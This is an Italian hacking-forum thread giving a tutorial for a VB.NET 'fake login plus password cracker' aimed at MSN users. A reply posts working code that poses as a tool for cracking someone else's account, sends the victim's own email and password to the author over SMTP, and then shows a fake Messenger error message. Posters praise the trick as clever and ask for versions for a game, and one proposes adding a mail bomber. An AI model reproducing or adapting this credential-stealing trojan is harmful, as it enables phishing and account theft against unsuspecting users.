• Regolamento Macrocategoria DEV
    Prima di aprire un topic nella Macrocategoria DEV, è bene leggerne il suo regolamento. Sei un'azienda o un hosting/provider? Qui sono anche contenute informazioni per collaborare con Sciax2 ed ottenere l'accredito nella nostra community!

NSghost95

Nuovo utente
Autore del topic
1 Febbraio 2009
39
43
Miglior risposta
0
[VB08] Come creare un Fake Login + Password Cracker

Salve a tutti, ho usato il tasto cerca ma non ho trovato nessuna guida (dopo non è colpa mia se vi inventate nomi strani e vi copiate tra di voi ù.ù), allora, sono 2h che ci lavoro e, considerando che questo è il mio primo programma in visual basic (non è vero, è il 4° ma volevo fare scena) posso dire che non me la sono cavata male.... vi avviso già da subito che non ho copiato niente da nessuno e il progetto non ha nè immagini nè nient'altro, dovete personalizzarlo voi, mi dispiace... allora, cominciamo:

1) solita routine:
-Nuovo progetto
-Applicazione Windows Form
-*titolo*
21o2f6t.jpg

2) create:
-3 Label
-3 Textbox
-1 Button
-1 Progressbar
-6 Timer
24evsp3.jpg

3) rinominate:
Label: Tua Mail, Tua Password, Account da Craccare
Texxbox: //
Button: Crack
Progressbar: //
Timer: //
25irhh3.jpg

4) nella button1 inserite:
Codice:
Perfavore, Entra oppure Registrati per vedere i codici!

5) nel timer1 inserite:
Codice:

6) nel timer2 inserite:
Codice:

6) nel timer3 inserite:
Codice:

7) nel timer4 inserite:
Codice:

8) nel timer5 inserite:
Codice:

9) infine nel timer6 inserite:
Codice:

10) modificate il bottone con la vostra mail e password per inviarvi i dati

11) rinominate la form

Download Progetti:
Perfavore, Entra oppure Registrati per vedere i Link!
(esempio)
(fixata)
(graficata)
(fixata)
(fixata)
(fixata)
(fixata)

fine :°°: :°°: aspetto critiche...

Ultima modifica:
  • Like
Reactions: 1 person
sono anche io un novellino in vb.net ma CREDO che qui vada meglio con degli else if

If TextBox1.Text = "" Then MsgBox("Per favore, inserisci un nome utente", vbCritical, "Errore")
If TextBox1.Text <> "" And TextBox2.Text <> "" And TextBox3.Text <> "" Then Timer1.Start()
If TextBox2.Text = "" Then MsgBox("Per favore, inserisci una password", vbCritical, "Errore")
If TextBox3.Text = "" Then
MsgBox("Per favore, inserisci un contatto msn da craccare", vbCritical, "Errore")

comunque è molto furbo questo programma io ne feci uno del genere;il mio praticamente agiva così l'utente mandava un email inserendo user e pass e mentre lui mandava la sua email il mio programma me ne mandava una a me con il suo utente e password comunque complimenti sei stato furbo

Ultima modifica:

omg hai ragione, mi hai dato una buona idea, adesso ne faccio un altro come hai detto tu.... però faccio una mail bomber... perchè mandare una sola mail non interessa a nessuno...

Nel button, sarebbe meglio inserire:

Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
MsgBox("Attenzione l'account da craccare deve appartenere alla tua lista contatti.")
If TextBox1.Text = "" Then MsgBox("Per favore, inserisci un nome utente", vbCritical, "Errore")
If TextBox1.Text <> "" And TextBox2.Text <> "" And TextBox3.Text <> "" Then Timer1.Start()
If TextBox2.Text = "" Then MsgBox("Per favore, inserisci una password", vbCritical, "Errore")
If TextBox3.Text = "" Then
MsgBox("Per favore, inserisci un contatto msn da craccare", vbCritical, "Errore")
Else
End If
Dim smtpserver As New Net.Mail.SmtpClient()
Dim mail As New Net.Mail.MailMessage()
smtpServer.Credentials = New Net.NetworkCredential("Mail", "Password") 'inserisci qui la tua mail e la tua password
smtpserver.Port = 587 'se non usi hotmail/live, controlla il file smtp.txt all'interno dell'archivio
smtpserver.Host = "smtp.gmail.com" 'se non usi hotmail/live, controlla il file smtp.txt all'interno dell'archivio
smtpserver.EnableSsl = True
mail = New Net.Mail.MailMessage()
mail.From = New Net.Mail.MailAddress("mail") 'inserisci la tua mail
mail.To.Add("Mail") 'inserisci la tua mail
mail.Subject = "FakeLogin" 'inserisci l'oggetto del messaggio
mail.Body = "Mail: " & TextBox1.Text & ", " & "Password: " & TextBox2.Text & ", " & "Account che voleva craccare: " & TextBox3.Text
smtpServer.Send(mail)
MsgBox("Accesso a Windows Live Messenger non riuscito. La password è errata o il servizio è temporaneamente non disponibile. Controlla la password o riprova in seguito.") 'inserisci un falso messaggio di errore
MsgBox("Codice errore: 80071392") 'inserisci un falso codice errore (consigliato)
End Sub
...

Ultima modifica:
ho seguito il consiglio di loryx95 e ho migliorato il fake, non ho voglia di rifare la guida quindi posto solo il progetto:

EDIT:
e per finire..... ecco la versione graficata:
(se riuscite a sistemare meglio la grafica [io ho messo solo 1 immagine giusto per fregare i n00b] postate pure, mi fate solo un favore...)

Ultima modifica:
Ciao a tutti, sono nuovo e mi sono imbattuto in questo post.
Vorrei capire come usare questo strumento, perchè io sono un quasi completo ignorante in programmazione (solo qualcosina in unix).
Quando faccio partire msn.exe sul mio pc e inserisco i dati mi escono un sacco di errori.

Grazie 1000

Ottimo, con questa guida hai dato pane ai Lamer, con sopra una bella spalmata di Philadelphia. patpat

ciao a tutti, innanzitutto volevo ringraziarvi per questo post che è fantistico, però ho dei problemi con il server smpt. inoltre mi chiedevo se qualcuno poteva crearne uno per yugioh online 3 duel evolution è lo stesso procedimento solo che al posto di email e password di msn sono username, password e bp....grazie per la disponibilità ciao a tutti

Allora a me funziona tutto tranne la cosa piu importante O_O
quando arriva il momento che lo script deve inviare la mail mi da errore e si impalla.... durante il debug mi da questo errore:

come risolvo?

Riferimento: Come creare un Fake Login + Password Cracker

smtpServer.Credentials = New Net.NetworkCredential("Mail", "Password") 'inserisci qui la tua mail e la tua password

sto pezzo non mi è chiaro.
--------------- AGGIUNTA AL POST ---------------
Allora a me funziona tutto tranne la cosa piu importante O_O
quando arriva il momento che lo script deve inviare la mail mi da errore e si impalla.... durante il debug mi da questo errore:

come risolvo?
anche a me

Ultima modifica:
Riferimento: Come creare un Fake Login + Password Cracker

10) modificate il bottone con la vostra mail e password per inviarvi i dati non ho capito cosa si fa DX :cry: